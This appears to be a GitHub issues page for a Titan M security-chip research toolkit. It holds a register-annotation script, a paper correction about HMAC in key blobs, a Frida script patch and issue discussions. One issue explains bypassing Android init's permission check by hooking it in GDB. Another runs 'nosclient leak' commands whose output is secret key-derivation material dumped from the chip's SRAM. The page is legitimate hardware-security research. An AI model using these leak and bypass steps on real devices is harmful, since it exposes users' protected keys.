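ROM:00001B5E 18 68                       LDR     R0, [R3]
ROM:00001B60 80 F0 04 00                 EOR.W   R0, R0, #4
ROM:00001B64 C0 F3 80 00                 UBFX.W  R0, R0, #2, #1
ROM:00001B68 70 47                       BX      LR
"""

INSN_RE = re.compile(r"^ROM:[0-9A-F]{8}\s+(?:[0-9A-F]{2}\s)*\s*([A-Z]+(?:\.W)?)\s+(.*?)\s*(?:;.*)?$")
MASK32 = 0xFFFFFFFF


def reg_name(addr):
    if addr in SCS_REGS:
        return SCS_REGS[addr][0]
    if 0xE0000000 <= addr <= 0xE00FFFFF:
        return f"SCS/PPB 0x{addr:08X} (not in table)"
    return f"peripheral 0x{addr:08X} (chip specific)"


def bit_names(addr, mask):
    bits = SCS_REGS.get(addr, (None, {}))[1]
    return [bits.get(i, f"bit{i}") for i in range(32) if mask >> i & 1]


def annotate_listing(listing):
    """Track literal-pool addresses and read-modify-write masks through the
    listing; return one record per memory access, in program order."""
    regs = {}       # Rn -> ("addr", a) or ("val", a, and_mask, or_mask)
    accesses = []
    for line in listing.splitlines():
        m = INSN_RE.match(line)
        if not m:
            continue                        # labels, comments, data directives
        mnem, ops = m.group(1), [o.strip() for o in m.group(2).split(",")]
        if mnem == "LDR" and ops[1].startswith("="):           # LDR Rd, =literal
            regs[ops[0]] = ("addr", int(ops[1][1:], 0))
        elif mnem == "LDR" and ops[1].startswith("["):         # LDR Rd, [Rn]
            base = regs.get(ops[1].strip("[]"))
            if base and base[0] == "addr":
                regs[ops[0]] = ("val", base[1], MASK32, 0)
                accesses.append({"op": "read", "addr": base[1], "reg": reg_name(base[1])})
        elif mnem in ("AND.W", "ORR.W") and ops[2].startswith("#"):
            v = regs.get(ops[0])
            if v and v[0] == "val":
                imm = int(ops[2][1:], 0)
                if mnem == "AND.W":
                    regs[ops[0]] = ("val", v[1], v[2] & imm, v[3])
                else:
                    regs[ops[0]] = ("val", v[1], v[2], v[3] | imm)
        elif mnem == "STR" and ops[1].startswith("["):         # STR Rd, [Rn]
            base = regs.get(ops[1].strip("[]"))
            v = regs.get(ops[0])
            if base and base[0] == "addr" and v and v[0] == "val" and v[1] == base[1]:
                set_mask = v[3]
                clr_mask = (~v[2] & MASK32) & ~set_mask
                accesses.append({"op": "write", "addr": base[1], "reg": reg_name(base[1]),
                                 "set": set_mask, "set_bits": bit_names(base[1], set_mask),
                                 "clear": clr_mask})
    return accesses


if __name__ == "__main__":
    for rec in annotate_listing(LISTING_1A8C) + annotate_listing(LISTING_1B5C):
        print(rec)
```

For sub_1A8C the output is a write to DEMCR that sets TRCENA (and clears the low 24 bits) followed by a write to DWT_CTRL that sets CYCCNTENA, i.e. the sequence enables the DWT cycle counter; sub_1B5C only reads a chip-specific peripheral register at 0x40320030, which this table cannot name.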
  • leak.sh doesn't work

    On attempting to run the leak.sh script, I get:

    blueline:/data/local/tmp # ./leak.sh brom                                                                                                                                           
    Unable to stop service 'vendor.citadeld'
    See dmesg for error reason.
    Failed, retry index 0
    Failed, retry index 0
    Failed, retry index 0
    ...
    

    The problem is that citadeld cannot be stopped by the 'stop vendor.citadeld' command. dmesg reports:

        init: Unable to set property 'ctl.stop' from uid:0 gid:0 pid:11245: Invalid permissions to perform 'stop' on 'vendor.citadeld'

    Attaching the GDB debugger to the init process (PID 1) and hooking the

    bool CheckControlPropertyPerms(const std::string& name, const std::string& value,
                                   const std::string& source_context, const ucred& cr)
    

    function by making it return 1 helps to stop the citadeld process. I am using Android version 11.0.0 (RQ3A.211001.001, Oct 2021). What Android version did you use to run the dumping script?

    opened by NewDwarf 4
  • AES key ladder

    The Titan M chipset has an interesting hardware feature called a 'key ladder' for several algorithms. I am not sure what the primary purpose of this feature is: performance of the crypto algorithms or security. I would think it is a 'security feature' if the 'trusted root key' was fused directly in the OTP area of Titan M and was not accessible from the NOS tasks as well. If everything can be sniffed in the middle of user land <-> the NOS task, as well as application processor <-> Titan M by means of the breakout board, it doesn't look like an HSM. But it is just my personal opinion. I am not a security expert. Someone may find the information below useful: the AES key ladder has several chipset-specific registers to implement encryption/decryption.

    1. Input register 'AES_WFIFO_DATA' located at 0x40230008. The register has a FIFO concept. To store a 128-bit block, it is divided into four 32-bit blocks which are pushed to the same register.
    2. Output register 'AES_RFIFO_DATA' located at 0x4023000C. It has a similar FIFO concept for reading the processed data from the key ladder.
    3. Status register 'AES_RFIFO_EMPTY' located at 0x40230070. It works like while ( MEMORY[0x40230070] );
    4. Control register 'AES_CTRL' located at 0x40230000. This register is used to control the key size, cipher mode, processing direction (encryption/decryption) and endianness.
    5. Key expansion register 'AES_KEY_START' located at 0x4023004C. Writing '1' to this register triggers key expansion. Waiting for the key expansion is performed by while ( MEMORY[0x4023004C] );.
    6. To store the initialization vector, the 'GR_KEYMGR_AES_CTR' (??? Is counter mode used?) registers are used. There are four such registers, located at 0x40230050, 0x40230054, 0x40230058, 0x4023005C.
    7. @max-r-b Could you confirm that the register set '0x40233300, 0x40233304, ..., 0x40233320' is used to store the AES key? It seems these registers are also involved in HMAC computation. There is, definitely, the register 0x4023002C, ... for storing the raw AES key, but for some reason km_generate_key() doesn't use these registers.

    opened by NewDwarf 2
  • Getting salt and other random things

    Hi. I noticed interesting behaviour when getting the sensitive information from SRAM that is used for key derivation. The valid value is only periodically returned. In most cases it is just a zeroed buffer.

    blueline:/data/local/tmp # ./nosclient leak 0x17a00 20                                                                                                                          
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    blueline:/data/local/tmp # ./nosclient leak 0x17a00 20                                                                                                                              
    4b f5 12 2f 34 45 54 c5 3b de 2e bb 8c d2 b7 e3 d1 60 0a d6 31 c3 85 a5 d7 cc e2 3c 77 85 45 9a 
    blueline:/data/local/tmp # ./nosclient leak 0x17a00 20                                                                                                                              
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00                                                                                                                           
    blueline:/data/local/tmp # ./nosclient leak 0x17a00 20                                                                                                                              
    4b f5 12 2f 34 45 54 c5 3b de 2e bb 8c d2 b7 e3 d1 60 0a d6 31 c3 85 a5 d7 cc e2 3c 77 85 45 9a
    ==========================
    
    blueline:/data/local/tmp # ./nosclient leak 0x17a20 20
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    blueline:/data/local/tmp # ./nosclient leak 0x17a20 20
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    blueline:/data/local/tmp # ./nosclient leak 0x17a20 20
    9a e2 3c 4d 13 6d 1b 8c a5 70 2f a2 54 20 f0 dd d3 52 f2 04 b4 34 86 1f 74 06 90 0c 72 0d d5 89
    blueline:/data/local/tmp # ./nosclient leak 0x17a20 20
    9a e2 3c 4d 13 6d 1b 8c a5 70 2f a2 54 20 f0 dd d3 52 f2 04 b4 34 86 1f 74 06 90 0c 72 0d d5 89
    ==========================
    
    blueline:/data/local/tmp # ./nosclient leak 0x17a40 20
    70 32 ea 8e 4c db 6d 0c 1e 4f 2e f2 d6 d6 d3 99 4d 58 ba 4b b9 45 fd ff c7 cc 4a 2e 15 bd 67 66
    blueline:/data/local/tmp # ./nosclient leak 0x17a40 20
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    blueline:/data/local/tmp # ./nosclient leak 0x17a40 20
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    blueline:/data/local/tmp # ./nosclient leak 0x17a40 20
    70 32 ea 8e 4c db 6d 0c 1e 4f 2e f2 d6 d6 d3 99 4d 58 ba 4b b9 45 fd ff c7 cc 4a 2e 15 bd 67 66
    ==========================
    
    blueline:/data/local/tmp # ./nosclient leak 0x17a60 20
    67 53 b7 a2 53 55 9b 8c bf b8 f2 66 e5 75 05 a8 7a 49 b4 73 cf 73 8f 07 41 c7 61 56 78 2b 79 03
    blueline:/data/local/tmp # ./nosclient leak 0x17a60 20
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    blueline:/data/local/tmp # ./nosclient leak 0x17a60 20
    67 53 b7 a2 53 55 9b 8c bf b8 f2 66 e5 75 05 a8 7a 49 b4 73 cf 73 8f 07 41 c7 61 56 78 2b 79 03
    blueline:/data/local/tmp # ./nosclient leak 0x17a60 20
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    ==========================
    

    Is there any explanation of why this happens? An attempt to access locked memory addresses used by other activities?

    opened by NewDwarf 2
  • Typo/inaccuracy in the EU-21-Rossi_Bellom-2021_A_Titan_M_Odyssey.pdf paper

    Typo/inaccuracy in the EU-21-Rossi_Bellom-2021_A_Titan_M_Odyssey.pdf paper

    The EU-21-Rossi_Bellom-2021_A_Titan_M_Odyssey.pdf paper has a possible typo or inaccuracy in the 'Key Blob structure' description, p. 49. The paper claims that the last 32 bytes of the key blob, starting from offset 0x5e0, are the SHA256 digest. But it is not so. It is HMAC-SHA256. I think it doesn't make sense to use just SHA256 there, as just a hash doesn't guarantee authenticity. But HMAC does.

    opened by NewDwarf 1
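To make the distinction drawn in that issue concrete (a bare digest over the blob can be recomputed by anyone who alters it, an HMAC only by a holder of the key), here is an added Python example; it is not code from the Titan M tools or the paper, and the blob body, the device key and the 0x600-byte total length (inferred from a 32-byte tag at offset 0x5e0) are constructed assumptions.

```python
import hashlib
import hmac

# Layout from the issue: a 32-byte tag at offset 0x5e0 is the last field, so
# the whole blob is 0x600 bytes (inferred here, not stated on the page).
TAG_OFFSET = 0x5E0
BLOB_LEN = TAG_OFFSET + 32

# Constructed values: a made-up blob body and a made-up device-bound key.
# The real key stays inside the chip; the party in modify_without_key() lacks it.
BODY = bytes((i * 7 + 3) & 0xFF for i in range(TAG_OFFSET))
DEVICE_KEY = bytes(range(32))

def seal_sha256(body: bytes) -> bytes:
    """Hash-only trailer, as the paper's description (p. 49) reads."""
    return body + hashlib.sha256(body).digest()

def seal_hmac(body: bytes, key: bytes) -> bytes:
    """HMAC-SHA256 trailer, as the issue says the blob actually uses."""
    return body + hmac.new(key, body, hashlib.sha256).digest()

def verify_sha256(blob: bytes) -> bool:
    """Integrity check a hash-only trailer permits: no secret involved."""
    if len(blob) != BLOB_LEN:
        return False
    body, tag = blob[:TAG_OFFSET], blob[TAG_OFFSET:]
    return hmac.compare_digest(tag, hashlib.sha256(body).digest())

def verify_hmac(blob: bytes, key: bytes) -> bool:
    """Authenticity check the key holder performs (constant-time compare)."""
    if len(blob) != BLOB_LEN:
        return False
    body, tag = blob[:TAG_OFFSET], blob[TAG_OFFSET:]
    return hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest())

def modify_without_key(blob: bytes) -> bytes:
    """All a party without DEVICE_KEY can do: alter the body and recompute a
    plain SHA256 over it. The HMAC cannot be recomputed without the key."""
    body = bytearray(blob[:TAG_OFFSET])
    body[0x10] ^= 0x01
    return seal_sha256(bytes(body))

def compare_trailers() -> dict:
    """The same modification checked against both trailer types."""
    genuine = seal_hmac(BODY, DEVICE_KEY)
    return {
        "sha256_accepts_modified": verify_sha256(modify_without_key(seal_sha256(BODY))),
        "hmac_accepts_genuine": verify_hmac(genuine, DEVICE_KEY),
        "hmac_accepts_modified": verify_hmac(modify_without_key(genuine), DEVICE_KEY),
    }
```

The hash-only trailer accepts the altered blob because its check needs nothing the modifier lacks; the HMAC trailer rejects it, which is the authenticity property the issue points out.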
  • Frida callapp.js script doesn't work

    Frida callapp.js script doesn't work

    The frida script 'callapp.js' has several issues. I guess the code base was slightly modified after the original creation of the frida script. Below is the patch:

    $ git diff callapp.js
    diff --git a/nugget_toolkit/scripts/frida/callapp.js b/nugget_toolkit/scripts/frida/callapp.js
    index c75fc10..333f222 100644
    --- a/nugget_toolkit/scripts/frida/callapp.js
    +++ b/nugget_toolkit/scripts/frida/callapp.js
    @@ -14,7 +14,7 @@ var app_id, param;
     var request, request_size;
     var reply, reply_size_addr, reply_size;
     
    -var libname = "parser.so";
    +var libname = "libparser.so";
     var libdir = "/data/local/tmp/";
     var libpath = libdir + libname;
     
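    Review bot: the rename to `libparser.so` only helps if the file at `libpath` (built from `libdir + libname` here) really carries that name; because `Module.findExportByName(libname, ...)` further down returns null rather than throwing when the module is not loaded, log `libpath` or check that the module is present right after these lines, so a filename mismatch is reported at this point instead of surfacing later as a null `NativeFunction` address.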
    @@ -25,7 +25,7 @@ log("Found sanity function at: " + sanity_func);
     var sanity_res = sanity_func();
     log("Sanity function returned " + sanity_res);
     
    -var parser_func = new NativeFunction(Module.findExportByName(libname, "_Z6parserjjPcjS_Pj"), "void", ["int", "int", "pointer", "int", "pointer", "pointer"]);
    +var parser_func = new NativeFunction(Module.findExportByName(libname, "parser"), "void", ["int", "int", "pointer", "int", "pointer", "int"]);
     
     Interceptor.attach(moduleBase, {
         onEnter: function(args) {
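    Review bot: switching the export name from `_Z6parserjjPcjS_Pj` to `parser` also changes the last parameter type from `"pointer"` to `"int"`; the mangled name encodes that final argument as `unsigned int *` (the trailing `Pj`), so the new declaration is only correct against a libparser.so rebuilt to export an unmangled (extern "C") `parser` that takes the size by value. Add a null check on the result of `Module.findExportByName(libname, "parser")` before passing it to `NativeFunction`, since a lookup that still fails otherwise produces an unhelpful error at construction time.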
    @@ -63,8 +63,8 @@ Interceptor.attach(moduleBase, {
                 log("Reply has null size");
             }
     
    -        parser_func(app_id, param, request, request_size, reply, reply_size_addr);
    +        parser_func(app_id, param, request, request_size, reply, reply_size);
     
             log("------------------------------------------------------------------------------------------------------");
         }
    -});
    \ No newline at end of file
    +});
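    Review bot: `parser_func(...)` is still called unconditionally after the `log("Reply has null size")` branch, so with the by-value `reply_size` argument a null-size reply now reaches the parser with whatever `reply_size` holds at that moment; guard the call (or return early in that branch) and make sure `reply_size` is the value read from `reply_size_addr` after the native call returns, since the address itself is no longer passed through. Restoring the trailing newline at `});` is fine.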
    
    opened by NewDwarf 1
Owner
Quarkslab